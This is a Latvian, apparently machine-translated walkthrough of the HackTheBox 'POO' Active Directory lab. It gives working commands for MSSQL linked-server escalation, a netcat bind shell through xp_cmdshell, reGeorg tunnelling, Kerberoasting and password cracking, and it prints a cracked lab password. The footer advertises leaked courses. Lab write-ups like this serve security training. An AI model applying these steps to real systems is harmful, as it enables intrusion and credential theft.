🥇HackTheBox beigu spēle. Laboratorijas Profesionālo uzbrukuma operāciju pāreja. Active Directory Pentest

Šajā rakstā mēs analizēsim ne tikai mašīnas, bet arī visas mini laboratorijas pāreju no vietas HackTheBox.

Kā norādīts aprakstā, POO ir paredzēts, lai pārbaudītu prasmes visos uzbrukumu posmos nelielā Active Directory vidē. Mērķis ir apdraudēt pieejamu saimniekdatoru, palielināt privilēģijas un galu galā apdraudēt visu domēnu, vienlaikus savācot 5 karodziņus.

Savienojums ar laboratoriju notiek caur VPN. Ieteicams nepieslēgties no darba datora vai resursdatora, kurā ir jums svarīgi dati, jo jūs nonākat privātā tīklā ar cilvēkiem, kuri kaut ko zina informācijas drošības jomā :)

organizatoriskā informācija
Lai jūs varētu uzzināt par jauniem rakstiem, programmatūru un citu informāciju, es izveidoju Telegrammas kanāls и grupa, lai apspriestu visus jautājumus IIKB apgabalā. Arī jūsu personīgie lūgumi, jautājumi, ieteikumi un ieteikumi Es paskatīšos un atbildēšu visiem..

Visa informācija tiek sniegta tikai izglītojošiem nolūkiem. Šī dokumenta autors neuzņemas atbildību par jebkādiem zaudējumiem, kas kādam nodarīti, izmantojot zināšanas un metodes, kas iegūtas šī dokumenta izpētē.

Intro

Šī beigu spēle sastāv no divām mašīnām, un tajā ir 5 karodziņi.

Tiek sniegts arī pieejamā resursdatora apraksts un adrese.

Sāksim!

Izlūkošanas karogs

Šīs mašīnas IP adrese ir 10.13.38.11, kuru es pievienoju /etc/hosts.
10.13.38.11 poo.htb

Pirmais solis ir skenēt atvērtos portus. Tā kā visu portu skenēšana ar nmap aizņem ilgu laiku, vispirms to darīšu ar masscan. Mēs skenējam visus TCP un UDP portus no tun0 saskarnes ar ātrumu 500 pps.

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

Tagad, lai iegūtu detalizētāku informāciju par pakalpojumiem, kas darbojas portos, veiksim skenēšanu ar opciju -A.

nmap -A poo.htb -p80,1433

Tātad mums ir IIS un MSSQL pakalpojumi. Šajā gadījumā mēs uzzināsim īsto domēna un datora DNS nosaukumu. Tīmekļa serverī mūs sagaida IIS mājas lapa.

Ejam cauri direktorijiem. Šim nolūkam izmantoju gobuster. Parametros norādām pavedienu skaitu 128 (-t), URL (-u), vārdnīcu (-w) un mūs interesējošos paplašinājumus (-x).

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

Tas mums nodrošina HTTP autentifikāciju direktorijam /admin, kā arī pieejamu darbvirsmas pakalpojuma .DS_Store failu. .DS_Store ir faili, kas saglabā mapes pielāgotos iestatījumus, piemēram, failu sarakstu, ikonu atrašanās vietas un atlasīto fona attēlu. Šāds fails var nonākt tīmekļa izstrādātāju tīmekļa servera direktorijā. Tādā veidā mēs iegūstam informāciju par direktorija saturu. Šim nolūkam jūs varat izmantot DS_Veikala rāpuļprogramma.

python3 dsstore_crawler.py -i http://poo.htb/

Mēs iegūstam direktorijas saturu. Visinteresantākais šeit ir /dev direktorijs, no kura varam apskatīt avotus un db failus divās atzarās. Taču mēs varam izmantot pirmās 6 failu un direktoriju nosaukumu rakstzīmes, ja pakalpojums ir neaizsargāts pret IIS ShortName. Varat pārbaudīt šo ievainojamību, izmantojot IIS saīsinātā nosaukuma skeneris.

Un mēs atrodam vienu teksta failu, kas sākas ar “poo_co”. Nezinot, ko darīt tālāk, es vienkārši atlasīju no direktoriju vārdnīcas visus vārdus, kas sākas ar “co”.

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

Un mēs to atrisināsim, izmantojot wfuzz.

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

Un mēs atrodam īsto vārdu! Apskatām šo failu, saglabājam akreditācijas datus (spriežot pēc DBNAME parametra, tie ir no MSSQL).

Mēs nododam karogu un dodam 20% uz priekšu.

Huh karogs

Mēs pieslēdzamies MSSQL, es izmantoju DBeaver.

Šajā datu bāzē neko interesantu neatradām, izveidosim SQL redaktoru un pārbaudīsim, kādi lietotāji tur ir.

SELECT name FROM master..syslogins;

Mums ir divi lietotāji. Pārbaudīsim savas privilēģijas.

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

Tādējādi nav nekādu privilēģiju. Apskatīsim saistītos serverus, es detalizēti rakstīju par šo tehniku šeit.

SELECT * FROM master..sysservers;

Tātad mēs atrodam citu SQL serveri. Pārbaudīsim komandu izpildi šajā serverī, izmantojot openquery().

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

Un mēs pat varam izveidot vaicājumu koku.

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

Fakts ir tāds, ka, kad mēs iesniedzam pieprasījumu saistītam serverim, pieprasījums tiek izpildīts cita lietotāja kontekstā! Apskatīsim, kādā lietotāja kontekstā mēs darbojamies saistītajā serverī.

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

Tagad redzēsim, kādā kontekstā pieprasījums tiek veikts no saistītā servera uz mūsu serveri!

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

Tādējādi tas ir DBO konteksts, kuram ir jābūt visām privilēģijām. Pārbaudīsim privilēģijas, ja tiek saņemts pieprasījums no saistīta servera.

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

Kā redzat, mums ir visas privilēģijas! Izveidosim savu administratoru šādi. Bet viņi to neatļauj, izmantojot openquery, darīsim to, izmantojot EXECUTE AT.

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

Un tagad mēs izveidojam savienojumu ar jaunā lietotāja akreditācijas datiem, mēs novērojam jauno karogu datu bāzi.

Nododam šo karogu un dodamies tālāk.

BackTrack karogs

Iegūstam čaulu, izmantojot MSSQL, es izmantoju mssqlclient no impacket pakotnes.

mssqlclient.py ralf:[email protected] -db POO_PUBLIC

Mums ir jāiegūst paroles, un pirmā lieta, ko mēs jau esam saskārušies, ir vietne. Tādējādi mums ir nepieciešama tīmekļa servera konfigurācija (nav iespējams atstāt ērtu apvalku, acīmredzot ugunsmūris darbojas).

Bet piekļuve ir liegta. Lai gan mēs varam nolasīt failu no MSSQL, mums vienkārši jāzina, kuras programmēšanas valodas ir konfigurētas. Un MSSQL direktorijā mēs uzzinām, ka ir Python.

Tad nav nekādu problēmu lasīt web.config failu.

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

Ar atrastajiem akreditācijas datiem dodieties uz /admin un paņemiet karogu.

Pēdas karogs

Patiesībā ugunsmūra lietošana rada zināmas neērtības, taču, apskatot tīkla iestatījumus, pamanām, ka tiek izmantots arī IPv6!

Pievienosim šo adresi /etc/hosts.
dead:babe::1001 poo6.htb
Skenēsim resursdatoru vēlreiz, bet izmantojot IPv6 protokolu.

Un WinRM pakalpojums ir pieejams, izmantojot IPv6. Sazināsimies ar atrastajiem akreditācijas datiem.

Uz darbvirsmas ir karogs, mēs to nododam.

P00ned karogs

Pēc iepazīšanās veikšanas uz saimnieka, izmantojot vējzirņi Neko īpašu neatrodam. Tad tika nolemts vēlreiz meklēt akreditācijas datus (es arī rakstīju par šo tēmu raksts). Bet es nevarēju iegūt visus SPN no sistēmas, izmantojot WinRM.

setspn.exe -T intranet.poo -Q */*

Palaidīsim komandu, izmantojot MSSQL.

Izmantojot šo metodi, mēs iegūstam lietotāju SPN p00_hr un p00_adm, kas nozīmē, ka viņi ir neaizsargāti pret tādu uzbrukumu kā Kerberoasting. Īsāk sakot, mēs varam iegūt viņu paroļu jaucējus.

Vispirms jums ir jāiegūst stabils apvalks MSSQL lietotāja vārdā. Bet, tā kā mums ir ierobežota piekļuve, mums ir savienojums ar resursdatoru tikai caur portiem 80 un 1433. Bet ir iespējams tunelēt satiksmi caur 80. ostu! Šim nolūkam mēs izmantojam šādu pieteikumu. Augšupielādēsim failu tunnel.aspx tīmekļa servera mājas direktorijā - C:inetpubwwwroot.

Bet, mēģinot tai piekļūt, tiek parādīta kļūda 404. Tas nozīmē, ka *.aspx faili netiek izpildīti. Lai faili ar šiem paplašinājumiem tiktu izpildīti, instalējiet ASP.NET 4.5 šādi.

dism /online /enable-feature /all /featurename:IIS-ASPNET45

Un tagad, piekļūstot tunnel.aspx, mēs saņemam atbildi, ka viss ir gatavs darbam.

Palaidīsim lietojumprogrammas klienta daļu, kas pārraidīs trafiku. Mēs pārsūtīsim visu trafiku no porta 5432 uz serveri.

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

Un mēs izmantojam starpniekserveri, lai nosūtītu jebkuras lietojumprogrammas trafiku, izmantojot mūsu starpniekserveri. Pievienosim šo starpniekserveri konfigurācijas failam /etc/proxychains.conf.

Tagad augšupielādēsim programmu serverī netcat, ar kuru mēs izveidosim stabilu saistīšanas apvalku un skriptu Invoke-Kerberoast, ar kuru veiksim Kerberoasting uzbrukumu.

Tagad mēs palaižam klausītāju, izmantojot MSSQL.

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

Un mēs izveidojam savienojumu, izmantojot starpniekserveri.

proxychains rlwrap nc poo.htb 4321

Un pieņemsim jaucējvārdus.

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

Tālāk jums ir jāatkārto šīs jaucējzīmes. Tā kā rockyou vārdnīcā šīs paroles nebija, es izmantoju VISAS Seclists piedāvātās paroļu vārdnīcas. Meklēšanai mēs izmantojam hashcat.

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

Un mēs atrodam abas paroles, pirmo vārdnīcā dutch_passwordlist.txt un otro Keyboard-Combinations.txt.

Un tā mums ir trīs lietotāji, ejam uz domēna kontrolleri. Vispirms noskaidrojam viņa adresi.

Lieliski, mēs uzzinājām domēna kontrollera IP adresi. Noskaidrosim visus domēna lietotājus, kā arī to, kurš no viņiem ir administrators. Lai lejupielādētu skriptu, lai iegūtu informāciju PowerView.ps1. Pēc tam mēs izveidosim savienojumu, izmantojot evil-winrm, parametrā -s norādot direktoriju ar skriptu. Un tad mēs vienkārši ielādēsim PowerView skriptu.

Tagad mums ir piekļuve visām tā funkcijām. Lietotājs p00_adm izskatās kā priviliģēts lietotājs, tāpēc mēs strādāsim viņa kontekstā. Izveidosim šim lietotājam PSCredential objektu.

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

Tagad visas Powershell komandas, kurās mēs norādām Creds, tiks izpildītas kā p00_adm. Parādīsim lietotāju sarakstu un atribūtu AdminCount.

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

Un tāpēc mūsu lietotājs ir patiešām priviliģēts. Paskatīsimies, kurās grupās viņš ir.

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

Visbeidzot mēs apstiprinām, ka lietotājs ir domēna administrators. Tas dod tai tiesības attālināti pieteikties domēna kontrollerī. Mēģināsim pieteikties ar WinRM, izmantojot mūsu tuneli. Mani mulsināja reGeorg izdotās kļūdas, lietojot evil-winrm.

Tad mēs izmantojam citu, vieglāku, skripts lai izveidotu savienojumu ar WinRM. Atvērsim un mainīsim savienojuma parametrus.

Mēģinām izveidot savienojumu, un esam sistēmā.

Bet karoga nav. Pēc tam skatieties uz lietotāju un pārbaudiet galddatorus.

Atrodam karogu pie mr3ks un laboratorija ir 100% pabeigta.

Tas ir viss. Kā atsauksmes, lūdzu, komentējiet, vai no šī raksta uzzinājāt ko jaunu un vai tas jums bija noderīgs.

Jūs varat mums pievienoties plkst Telegram. Tur var atrast interesantus materiālus, noplūdušos kursus, kā arī programmatūru. Pulcināsim kopienu, kurā būs cilvēki, kas saprot daudzas IT jomas, tad vienmēr varam palīdzēt viens otram jebkuros IT un informācijas drošības jautājumos.

Avots: www.habr.com

HackTheBoxendgame. Laboratorijas Profesionālo uzbrukuma operāciju pāreja. Pentest Active Directory